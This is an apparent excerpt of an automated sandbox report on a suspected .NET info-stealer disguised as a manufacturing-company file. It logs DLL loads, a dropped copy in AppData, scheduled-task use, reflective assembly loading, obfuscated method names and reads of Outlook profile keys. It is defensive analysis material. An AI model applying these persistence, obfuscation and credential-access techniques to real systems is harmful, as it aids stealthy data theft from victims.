Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.65b0000.5.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.3492250.3.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, qoqZYWktJStci6f29S.cs	.Net Code: yoJfVvX4u3 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.24d1188.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.36dd2f0.1.raw.unpack, qoqZYWktJStci6f29S.cs	.Net Code: yoJfVvX4u3 System.Reflection.Assembly.Load(byte[])
Source: 12.2.GhrKoSGuCdvpJ.exe.32b1104.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010A9C30 push esp; retf 010Ch	11_2_010A9D55
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_06929233 push es; ret	11_2_06929244
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703942D push edi; ret	20_2_0703942E

Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Static PE information: section name: .text entropy: 7.924386208696683
Source: GhrKoSGuCdvpJ.exe.0.dr	Static PE information: section name: .text entropy: 7.924386208696683

Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, HecPmJ6gFWvqumjiqv.cs	High entropy of concatenated method names: 'D3uJEMNjoA', 'CcRJBr8j7f', 'w7ZJDqbEil', 'Kb4J5VccR0', 'd86JN4NVnq', 'yFXJR32HNl', 'qPoJq2OdFq', 'F6xJXSvrlm', 'dKqJG47Bjd', 'I7oJgXgVvn'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, SMh6MIRIc6OakG07pp.cs	High entropy of concatenated method names: 'OmjkHs9vCX', 'F7ukJ1FjNW', 'RbRk1X7CL4', 'RoLkPpEJ0Y', 'lpckQADnKf', 'O9gkp4NJN5', 'JYaks2i9YL', 'dlHkuCtgfP', 'VoTkUmyXm7', 'T2BkeuVICG'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, uoVP2uCg0bdWUyFWjv.cs	High entropy of concatenated method names: 'uYW1dLwxiV', 'vyY1WWhoOC', 'chU10QmOqd', 'Ess1Z8lZoS', 'iRR1L6qK1P', 'Cb61C0WviQ', 'uCR12ILHVs', 'HJR1kgUixu', 'yx419Q7yq0', 'oP21r4iRaE'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, sTZIxnbilXR1LmWj3Sl.cs	High entropy of concatenated method names: 'm8u9aSqCN2', 'UR49OxHU1x', 'Nlk9V1JFZI', 'tH09dbXSAh', 'D9c9c0YPi8', 'ai09WVJrWG', 'EkR9lpPKlE', 'oJC90f34Qh', 'RKg9Zwib4d', 'm8g9xOnYZA'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, jy01KOzR750y1LXxEC.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Rwq9TOOtRZ', 'I5u9LImMm8', 'XEt9CPTKuL', 'wBG92qSwSi', 'iLE9k4ZdH3', 'jw099TlRgJ', 'Mpb9rFKkq0'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, t1DfyrSZWB1uISyNpZ.cs	High entropy of concatenated method names: 'K9KQ7TFMnh', 'E0IQJbmwkI', 'HiEQP81RaQ', 'aMnQpxiwnm', 'r5QQs1NnXd', 'j0lPNo1WDU', 'Mb2PRvhoO2', 'Np1PqkDSZE', 'deNPXOiUQH', 'XidPGLYKSW'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, QNWvhQjrZINN7KPu3U.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'p3JYG8gFty', 'GSuYgZiR1n', 'GxUYzZna0i', 'jaYtKp9Nkw', 'n3rtM42g7l', 'OJVtY8XMNN', 'xsPtttALNb', 'E1s42BjIUtnsAMJYRHL'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, kiqa3DwVxysX4lOlBK.cs	High entropy of concatenated method names: 'xl8VBKgsT', 'lG4dl9vV1', 'D8RWfMay5', 'VAelEEp3T', 'DtbZaqC94', 'CfZxk3HTM', 'Kq4VpAV4K2b2FpedVo', 'aLqKjK9J0dhueLmyJc', 'fPPkBqLY8', 'vU3rl5W7x'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, G1b9Yx2TcPUdaY9281.cs	High entropy of concatenated method names: 'uWiMpHEYse', 'IbEMsFwYUM', 'wQRMUILgWl', 'bWUMecCkd4', 'RpCMLFxjHm', 'mx8MCpwa6Y', 'MnhbSl6gyXKBTqRjxf', 'Ph7hI45WRD5FMMD70y', 'rWhMM88Iyt', 'vOvMtmCp0V'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, GgAgrKJsDwJ5JIVu6G.cs	High entropy of concatenated method names: 'CYdT0xQiSd', 'KQtTZ3BKEN', 'YmFT42MUS2', 'gypTbLQjw9', 'Mf7ToswUDs', 'XVTT3c4Xeb', 'HdiTn8u5IL', 'o7RTydAhKI', 'dR9T6R6wEh', 'op1Twjnngd'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, rrIrYEfBhY39sDlwNH.cs	High entropy of concatenated method names: 'dWi2XKVHcf', 'fA52gvkjr1', 'pvekKY05mS', 'tZSkMcqCTm', 'bcJ2whR0UC', 'J2L2jJE5Wk', 'tau2AEFhsf', 'W2y2E4pyN1', 'oQD2B20cvM', 'cEm2DN2fmQ'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, OpG0a7BjWJqeIRfEJr.cs	High entropy of concatenated method names: 'MQUpaEePsA', 'SDhpOONDfA', 'tvhpV8nsqh', 'KP2pdxnAU3', 'XUwpcrH6Uu', 'bhJpWDdZLR', 'PDOplhYHlf', 'ow7p0hlVe7', 'mtmpZGmCau', 'DXipxn90sw'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, a6Rf7FhOnIQQp4Keik.cs	High entropy of concatenated method names: 'Dispose', 'I1PMG2xkVV', 'IuVYbNwK7t', 'Lht8835Io1', 'WR4MgnZ2H5', 'TDTMzLOs2m', 'ProcessDialogKey', 'n6NYKJvkQ5', 'dEhYMgAtVW', 'PoSYYEGiQh'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, xhRr5d38UPcJ29ohL9.cs	High entropy of concatenated method names: 'MwxpH2ii7p', 'u33p1mU9NQ', 'XicpQ4ZAWi', 'y1NQgX81EX', 'iRmQzNJ1hS', 'XOVpKR5dpH', 'xKopMw7ld2', 'WdcpYhniml', 'IquptxSwR0', 'erRpf2uyr9'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, n99CWu8o4qWU03vC7R.cs	High entropy of concatenated method names: 'DLD2UTZ9CT', 'fck2e0G5Lx', 'ToString', 'X132HV5up9', 'cLa2JUBgox', 'l7n21BZcD1', 'JFh2PRon5I', 'P2Y2Q4FQEh', 'O0L2pAe2jI', 'Uc72s8f5WQ'
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.7200000.7.raw.unpack, OH7rokb1NRcoyR55vja.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gaVrE0mBJk', 'x3irBpZvIU', 'RUDrDd0gLR', 'bVZr5LUDEp', 'lkqrN0rBv6', 'iPJrR9B78l', 'PuLrqaZFDk'
